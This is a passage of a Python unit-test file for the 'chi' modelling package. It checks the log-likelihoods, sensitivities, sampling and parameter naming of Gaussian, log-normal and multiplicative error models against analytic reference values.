# dL/dsigma_rel = - x + x*error^2
# Test case II.1:
parameters = [0.9, 0.1]
model_output = [1] * 10
observations = [2] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 2)**2 / 2
ref_dpsi_0 = 10 * (-0.1 + 1 + 1 * 0.1) * 1
ref_dpsi_1 = 10 * (-0.1 + 1 + 1 * 0.1) * 2
ref_dsigma_base = -10 + 10 * 1
ref_dsigma_rel = -10 + 10 * 1 * 1
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 4)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_base)
self.assertAlmostEqual(sens[3], ref_dsigma_rel)
# Test case II.2:
parameters = [0.9, 0.1]
model_output = [1] * 10
observations = [10] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 10)**2 / 2
ref_dpsi_0 = 10 * (-0.1 + 9 + 9**2 * 0.1) * 1
ref_dpsi_1 = 10 * (-0.1 + 9 + 9**2 * 0.1) * 2
ref_dsigma_base = -10 + 10 * 9**2
ref_dsigma_rel = -10 + 10 * 9**2 * 1
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 4)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_base)
self.assertAlmostEqual(sens[3], ref_dsigma_rel)
def test_compute_sensitivities_bad_input(self):
# Model output and sensitivities don't match
parameters = [1, 0.1]
model_output = ['some', 'length']
observations = ['some', 'length']
sens = ['some', 'other', 'length']
with self.assertRaisesRegex(ValueError, 'The first dimension of'):
self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
def test_get_parameter_names(self):
parameters = self.error_model.get_parameter_names()
self.assertEqual(len(parameters), 2)
self.assertEqual(parameters[0], 'Sigma base')
self.assertEqual(parameters[1], 'Sigma rel.')
def test_n_parameters(self):
self.assertEqual(self.error_model.n_parameters(), 2)
def test_sample(self):
# Test I: sample size 1
seed = 42
parameters = [3, 2]
n_times = 3
model_output = [1] * n_times
sample = self.error_model.sample(parameters, model_output, seed=seed)
n_samples = 1
self.assertEqual(sample.shape, (n_times, n_samples))
self.assertAlmostEqual(sample[0, 0], 3.7952806720457217)
self.assertAlmostEqual(sample[1, 0], -6.022022696029159)
self.assertAlmostEqual(sample[2, 0], 0.6469945736947356)
# Test II: sample size > 1
n_samples = 4
sample = self.error_model.sample(
parameters, model_output, n_samples=n_samples, seed=seed)
self.assertEqual(sample.shape, (n_times, n_samples))
self.assertAlmostEqual(sample[0, 0], 2.046212634385726)
self.assertAlmostEqual(sample[1, 0], -4.115603997796511)
self.assertAlmostEqual(sample[2, 0], 0.5798718003966126)
self.assertAlmostEqual(sample[0, 1], 0.13453009521457915)
self.assertAlmostEqual(sample[1, 1], -4.824303722244952)
self.assertAlmostEqual(sample[2, 1], -2.920990871528623)
self.assertAlmostEqual(sample[0, 2], 4.186372271923463)
self.assertAlmostEqual(sample[1, 2], 3.140421812116401)
self.assertAlmostEqual(sample[2, 2], 6.0832766019365465)
self.assertAlmostEqual(sample[0, 3], 2.1031092234071647)
self.assertAlmostEqual(sample[1, 3], -0.04857959900325241)
self.assertAlmostEqual(sample[2, 3], 3.024316842149241)
def test_sample_bad_input(self):
# Too many paramaters
parameters = [1, 1, 1, 1, 1]
model_output = [1] * 10
with self.assertRaisesRegex(ValueError, 'The number of provided'):
self.error_model.sample(parameters, model_output)
def test_set_parameter_names(self):
# Set parameter names
names = ['some', 'names']
self.error_model.set_parameter_names(names)
parameters = self.error_model.get_parameter_names()
self.assertEqual(len(parameters), 2)
self.assertEqual(parameters[0], 'some')
self.assertEqual(parameters[1], 'names')
# Reset parameter names
names = None
self.error_model.set_parameter_names(names)
parameters = self.error_model.get_parameter_names()
self.assertEqual(len(parameters), 2)
self.assertEqual(parameters[0], 'Sigma base')
self.assertEqual(parameters[1], 'Sigma rel.')
def test_set_parameter_names_bad_input(self):
# Not the right number of names
names = ['Too', 'many', 'names']
with self.assertRaisesRegex(ValueError, 'Length of names'):
self.error_model.set_parameter_names(names)
class TestErrorModel(unittest.TestCase):
"""
Tests the chi.ErrorModel class.
"""
@classmethod
def setUpClass(cls):
cls.error_model = chi.ErrorModel()
def test_compute_log_likelihood(self):
parameters = 'some parameters'
model_output = 'some output'
observations = 'some observations'
with self.assertRaisesRegex(NotImplementedError, ''):
self.error_model.compute_log_likelihood(
parameters, model_output, observations)
def test_compute_pointwise_ll(self):
parameters = 'some parameters'
model_output = 'some output'
observations = 'some observations'
with self.assertRaisesRegex(NotImplementedError, ''):
self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
def test_compute_sensitivities(self):
parameters = 'some parameters'
model_output = 'some output'
sens = 'some sensitivities'
observations = 'some observations'
with self.assertRaisesRegex(NotImplementedError, ''):
self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
def test_get_parameter_names(self):
self.assertIsNone(self.error_model.get_parameter_names())
def test_n_parameters(self):
self.assertIsNone(self.error_model.n_parameters())
def test_sample(self):
parameters = 'some parameters'
model_output = 'some output'
with self.assertRaisesRegex(NotImplementedError, ''):
self.error_model.sample(parameters, model_output)
def test_set_parameter_names(self):
names = 'some names'
with self.assertRaisesRegex(NotImplementedError, ''):
self.error_model.set_parameter_names(names)
class TestGaussianErrorModel(unittest.TestCase):
"""
Tests the chi.GaussianErrorModel class.
"""
@classmethod
def setUpClass(cls):
cls.error_model = chi.GaussianErrorModel()
def test_compute_log_likelihood(self):
# Tests :meth:`compute_log_likelihood` and
# :meth:`compute_pointwise_ll`
# Test case I: If X = X^m, the score reduces to
# -np.log(2pi)/2 - np.log(sigma)
# Test case I.1:
parameters = [0.5]
model_output = [1] * 10
observations = [1] * 10
ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(0.5)
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case I.2:
parameters = [0.5]
model_output = [10] * 6
observations = [10] * 6
ref_score = -3 * np.log(2 * np.pi) - 6 * np.log(0.5)
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (6,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case II: If sigma = 1, the score reduces to
# -np.log(2pi)/2 - (X-X^m) / 2
# Test case II.1:
parameters = [1]
model_output = [1] * 10
observations = [2] * 10
ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 2)**2 / 2
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case II.2:
parameters = [1]
model_output = [1] * 10
observations = [10] * 10
ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 10)**2 / 2
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case III: -Infinity for not allowed regimes
# Test case III.1: Zero sigma
parameters = [0]
model_output = [1] * 10
observations = [1] * 10
ref_score = -np.inf
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case III.2: Negative sigma
parameters = [-1]
model_output = [1] * 10
observations = [1] * 10
ref_score = -np.inf
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
def test_compute_log_likelihood_bad_input(self):
# Model output and observations don't match
parameters = [1]
model_output = ['some', 'length']
observations = ['some', 'other', 'length']
with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
self.error_model.compute_log_likelihood(
parameters, model_output, observations)
with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
def test_compute_sensitivities(self):
# Test case I: If X = X^m, the scores reduce to
# L = -np.log(2pi)/2 - np.log(sigma)
# dL/dpsi = 0
# dL/dsigma_base = -1/sigma
# Test case I.1:
parameters = [0.5]
model_output = [1] * 10
observations = [1] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(0.5)
ref_dpsi_0 = 0
ref_dpsi_1 = 0
ref_dsigma_base = -10 / (0.5)
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 3)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_base)
# Test case I.2:
parameters = [0.5]
model_output = [10] * 10
observations = [10] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(0.5)
ref_dpsi_0 = 0
ref_dpsi_1 = 0
ref_dsigma_base = -10 / (0.5)
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 3)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_base)
# Test case II: If sigma = 1, the scores reduce to
# L = -np.log(2pi)/2 - (X-X^m) / 2
# dL/dpsi = error * dx/dpsi
# dL/dsigma_base = - 1 + error^2
# Test case II.1:
parameters = [1]
model_output = [1] * 10
observations = [2] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 2)**2 / 2
ref_dpsi_0 = 10 * (1) * 1
ref_dpsi_1 = 10 * (1) * 2
ref_dsigma_base = -10 + 10 * 1
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 3)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_base)
# Test case II.2:
parameters = [1]
model_output = [1] * 10
observations = [10] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 10)**2 / 2
ref_dpsi_0 = 10 * (9) * 1
ref_dpsi_1 = 10 * (9) * 2
ref_dsigma_base = -10 + 10 * 9**2
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 3)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_base)
def test_compute_sensitivities_bad_input(self):
# Model output and sensitivities don't match
parameters = [1]
model_output = ['some', 'length']
observations = ['some', 'length']
sens = ['some', 'other', 'length']
with self.assertRaisesRegex(ValueError, 'The first dimension of'):
self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
def test_get_parameter_names(self):
parameters = self.error_model.get_parameter_names()
self.assertEqual(len(parameters), 1)
self.assertEqual(parameters[0], 'Sigma')
def test_n_parameters(self):
self.assertEqual(self.error_model.n_parameters(), 1)
def test_sample(self):
# Test I: sample size 1
seed = 42
parameters = [0.5]
n_times = 3
model_output = [1] * n_times
sample = self.error_model.sample(parameters, model_output, seed=seed)
n_samples = 1
self.assertEqual(sample.shape, (n_times, n_samples))
# Test II: sample size > 1
n_samples = 4
sample = self.error_model.sample(
parameters, model_output, n_samples=n_samples, seed=seed)
self.assertEqual(sample.shape, (n_times, n_samples))
def test_sample_bad_input(self):
# Too many paramaters
parameters = [1, 1, 1, 1, 1]
model_output = [1] * 10
with self.assertRaisesRegex(ValueError, 'The number of provided'):
self.error_model.sample(parameters, model_output)
def test_set_parameter_names(self):
# Set parameter names
names = ['some name']
self.error_model.set_parameter_names(names)
parameters = self.error_model.get_parameter_names()
self.assertEqual(len(parameters), 1)
self.assertEqual(parameters[0], 'some name')
# Reset parameter names
names = None
self.error_model.set_parameter_names(names)
parameters = self.error_model.get_parameter_names()
self.assertEqual(len(parameters), 1)
self.assertEqual(parameters[0], 'Sigma')
def test_set_parameter_names_bad_input(self):
# Not the right number of names
names = ['Too', 'many', 'names']
with self.assertRaisesRegex(ValueError, 'Length of names'):
self.error_model.set_parameter_names(names)
class TestLogNormalErrorModel(unittest.TestCase):
"""
Tests the chi.LogNormalErrorModel class.
"""
@classmethod
def setUpClass(cls):
cls.error_model = chi.LogNormalErrorModel()
def test_compute_log_likelihood(self):
# Tests :meth:`compute_log_likelihood` and
# :meth:`compute_pointwise_ll`
# Test case I: If log X - log X^m = - sigma^2/2,
# the score reduces to
# -np.log(2pi)/2 - np.log(sigma) - np.log(X)
# Test case I.1:
parameters = [0.5]
model_output = [1 * np.exp(parameters[0]**2 / 2)] * 10
observations = [1] * 10
ref_score = \
-5 * np.log(2 * np.pi) - 10 * (np.log(0.5) + np.log(1))
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case I.2:
parameters = [0.5]
model_output = [10 * np.exp(parameters[0]**2 / 2)] * 6
observations = [10] * 6
ref_score = \
-3 * np.log(2 * np.pi) - 6 * (np.log(0.5) + np.log(10))
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (6,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case II: If sigma = 1, the score reduces to
# -np.log(2pi)/2 - log X - (log X - log X^m - 1/2)^2 / 2
# Test case II.1:
parameters = [1]
model_output = [1] * 10
observations = [2] * 10
ref_score = \
-5 * np.log(2 * np.pi) - 10 * np.log(2) \
- 10 * (np.log(1) - np.log(2) - 1 / 2)**2 / 2
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case II.2:
parameters = [1]
model_output = [1] * 10
observations = [10] * 10
ref_score = \
-5 * np.log(2 * np.pi) - 10 * np.log(10) \
- 10 * (np.log(1) - np.log(10) - 1 / 2)**2 / 2
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case III: -Infinity for not allowed regimes
# Test case III.1: Zero sigma
parameters = [0]
model_output = [1] * 10
observations = [1] * 10
ref_score = -np.inf
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case III.2: Negative sigma
parameters = [-1]
model_output = [1] * 10
observations = [1] * 10
ref_score = -np.inf
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case III.3: Zero model output
parameters = [1]
model_output = [0] * 10
observations = [1] * 10
ref_score = -np.inf
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
def test_compute_log_likelihood_bad_input(self):
# Model output and observations don't match
parameters = [1]
model_output = ['some', 'length']
observations = ['some', 'other', 'length']
with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
self.error_model.compute_log_likelihood(
parameters, model_output, observations)
with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
def test_compute_sensitivities(self):
# Test case I: If If log X - log X^m = - sigma^2/2,
# the scores reduce to
# L = -np.log(2pi)/2 - np.log(sigma) - np.log(X)
# dL/dpsi = 0
# dL/dsigma = -1/sigma
# Test case I.1:
parameters = [0.5]
model_output = [1 * np.exp(parameters[0]**2 / 2)] * 10
observations = [1] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = \
-5 * np.log(2 * np.pi) - 10 * (np.log(0.5) + np.log(1))
ref_dpsi_0 = 0
ref_dpsi_1 = 0
ref_dsigma_base = -10 / (0.5)
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 3)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_base)
# Test case I.2:
parameters = [0.5]
model_output = [10 * np.exp(parameters[0]**2 / 2)] * 10
observations = [10] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = \
-5 * np.log(2 * np.pi) - 10 * (np.log(0.5) + np.log(10))
ref_dpsi_0 = 0
ref_dpsi_1 = 0
ref_dsigma_base = -10 / (0.5)
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 3)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_base)
# Test case II: If sigma = 1, the scores reduce to
# L = -np.log(2pi)/2 - log X - (log X - log X^m + 1 / 2) / 2
# dL/dpsi = error * dx/dpsi
# dL/dsigma_base = - 1 + error^2
# Test case II.1:
parameters = [1]
model_output = [1] * 10
observations = [2] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = \
- 5 * np.log(2 * np.pi) - 10 * np.log(2) \
- 10 * (np.log(1) - np.log(2) - 1 / 2)**2 / 2
ref_dpsi_0 = 10 * (np.log(2) - np.log(1) + 1 / 2) / 1 * 1
ref_dpsi_1 = 10 * (np.log(2) - np.log(1) + 1 / 2) / 1 * 2
ref_dsigma_base = \
-10 + 10 * (np.log(1) - np.log(2) - 1 / 2)**2 \
- 10 * (np.log(2) - np.log(1) + 1 / 2)
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 3)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_base)
# Test case II.2:
parameters = [1]
model_output = [1] * 10
observations = [10] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = \
- 5 * np.log(2 * np.pi) - 10 * np.log(10) \
- 10 * (np.log(1) - np.log(10) - 1 / 2)**2 / 2
ref_dpsi_0 = 10 * (np.log(10) - np.log(1) + 1 / 2) / 1 * 1
ref_dpsi_1 = 10 * (np.log(10) - np.log(1) + 1 / 2) / 1 * 2
ref_dsigma_base = \
-10 + 10 * (np.log(1) - np.log(10) - 1 / 2)**2 \
- 10 * (np.log(10) - np.log(1) + 1 / 2)
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 3)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_base)
def test_compute_sensitivities_bad_input(self):
# Model output and sensitivities don't match
parameters = [1]
model_output = ['some', 'length']
observations = ['some', 'length']
sens = ['some', 'other', 'length']
with self.assertRaisesRegex(ValueError, 'The first dimension of'):
self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
def test_get_parameter_names(self):
parameters = self.error_model.get_parameter_names()
self.assertEqual(len(parameters), 1)
self.assertEqual(parameters[0], 'Sigma log')
def test_n_parameters(self):
self.assertEqual(self.error_model.n_parameters(), 1)
def test_sample(self):
# Test I: sample size 1
seed = 42
parameters = [0.5]
n_times = 3
model_output = [1] * n_times
sample = self.error_model.sample(parameters, model_output, seed=seed)
n_samples = 1
self.assertEqual(sample.shape, (n_times, n_samples))
# Test II: sample size > 1
n_samples = 4
sample = self.error_model.sample(
parameters, model_output, n_samples=n_samples, seed=seed)
self.assertEqual(sample.shape, (n_times, n_samples))
def test_sample_bad_input(self):
# Too many paramaters
parameters = [1, 1, 1, 1, 1]
model_output = [1] * 10
with self.assertRaisesRegex(ValueError, 'The number of provided'):
self.error_model.sample(parameters, model_output)
def test_set_parameter_names(self):
# Set parameter names
names = ['some name']
self.error_model.set_parameter_names(names)
parameters = self.error_model.get_parameter_names()
self.assertEqual(len(parameters), 1)
self.assertEqual(parameters[0], 'some name')
# Reset parameter names
names = None
self.error_model.set_parameter_names(names)
parameters = self.error_model.get_parameter_names()
self.assertEqual(len(parameters), 1)
self.assertEqual(parameters[0], 'Sigma log')
def test_set_parameter_names_bad_input(self):
# Not the right number of names
names = ['Too', 'many', 'names']
with self.assertRaisesRegex(ValueError, 'Length of names'):
self.error_model.set_parameter_names(names)
class TestMultiplicativeGaussianErrorModel(unittest.TestCase):
"""
Tests the erlotinib.MultiplicativeGaussianErrorModel class.
"""
@classmethod
def setUpClass(cls):
cls.error_model = chi.MultiplicativeGaussianErrorModel()
def test_compute_log_likelihood(self):
# Tests :meth:`compute_log_likelihood` and
# :meth:`compute_pointwise_ll`
# Test case I: If X = X^m, the score reduces to
# -np.log(2pi)/2 - np.log(sigma_tot)
# Test case I.1:
parameters = [0.1]
model_output = [1] * 10
observations = [1] * 10
ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(0.1 * 1)
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case I.2:
parameters = [0.1]
model_output = [10] * 6
observations = [10] * 6
ref_score = -3 * np.log(2 * np.pi) - 6 * np.log(0.1 * 10)
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (6,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case II: If sigma_tot = 1, the score reduces to
# -np.log(2pi)/2 - (X-X^m) / 2
# Test case II.1:
parameters = [1]
model_output = [1] * 10
observations = [2] * 10
ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 2)**2 / 2
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case II.2:
parameters = [0.1]
model_output = [10] * 10
observations = [100] * 10
ref_score = -5 * np.log(2 * np.pi) - 10 * (10 - 100)**2 / 2
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case III: -Infinity for not allowed regimes
# Test case III.1: Zero sigma_rel
parameters = [0]
model_output = [1] * 10
observations = [1] * 10
ref_score = -np.inf
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case III.2: Negative sigma_rel
parameters = [-1]
model_output = [1] * 10
observations = [1] * 10
ref_score = -np.inf
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
def test_compute_log_likelihood_bad_input(self):
# Model output and observations don't match
parameters = [0.1]
model_output = ['some', 'length']
observations = ['some', 'other', 'length']
with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
self.error_model.compute_log_likelihood(
parameters, model_output, observations)
with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
def test_compute_sensitivities(self):
# Test case I: If X = X^m, the scores reduce to
# L = -np.log(2pi)/2 - np.log(sigma_tot)
# dL/dpsi = -sigma_rel/sigma_tot * dx/dpsi
# dL/dsigma_base = -1/sigma_tot
# dL/dsigma_rel = -x/sigma_tot
# Test case I.1:
parameters = [0.1]
model_output = [1] * 10
observations = [1] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(0.1 * 1)
ref_dpsi_0 = -10 * 0.1 / (0.1) * 1
ref_dpsi_1 = -10 * 0.1 / (0.1) * 2
ref_dsigma_rel = -10 / (0.1) * 1
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 3)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_rel)
# Test case I.2:
parameters = [0.1]
model_output = [10] * 10
observations = [10] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(0.1 * 10)
ref_dpsi_0 = -10 * 0.1 / (1) * 1
ref_dpsi_1 = -10 * 0.1 / (1) * 2
ref_dsigma_rel = -10 / (1) * 10
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 3)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_rel)
# Test case II: If sigma_tot = 1, the scores reduce to
# L = -np.log(2pi)/2 - (X-X^m) / 2
# dL/dpsi = (-sigma_rel + error + error^2*sigma_rel) * dx/dpsi
# dL/dsigma_base = - 1 + error^2
# dL/dsigma_rel = - x + x*error^2
# Test case II.1:
parameters = [1]
model_output = [1] * 10
observations = [2] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 2)**2 / 2
ref_dpsi_0 = 10 * (-1 + 1 + 1 * 1) * 1
ref_dpsi_1 = 10 * (-1 + 1 + 1 * 1) * 2
ref_dsigma_rel = -10 + 10 * 1 * 1
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 3)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_rel)
# Test case II.2:
parameters = [1]
model_output = [1] * 10
observations = [10] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 10)**2 / 2
ref_dpsi_0 = 10 * (-1 + 9 + 9**2 * 1) * 1
ref_dpsi_1 = 10 * (-1 + 9 + 9**2 * 1) * 2
ref_dsigma_rel = -10 + 10 * 9**2 * 1
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 3)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_rel)
def test_compute_sensitivities_bad_input(self):
# Model output and sensitivities don't match
parameters = [0.1]
model_output = ['some', 'length']
observations = ['some', 'length']
sens = ['some', 'other', 'length']
with self.assertRaisesRegex(ValueError, 'The first dimension of'):
self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
def test_get_parameter_names(self):
parameters = self.error_model.get_parameter_names()
self.assertEqual(len(parameters), 1)
self.assertEqual(parameters[0], 'Sigma rel.')
def test_n_parameters(self):
self.assertEqual(self.error_model.n_parameters(), 1)
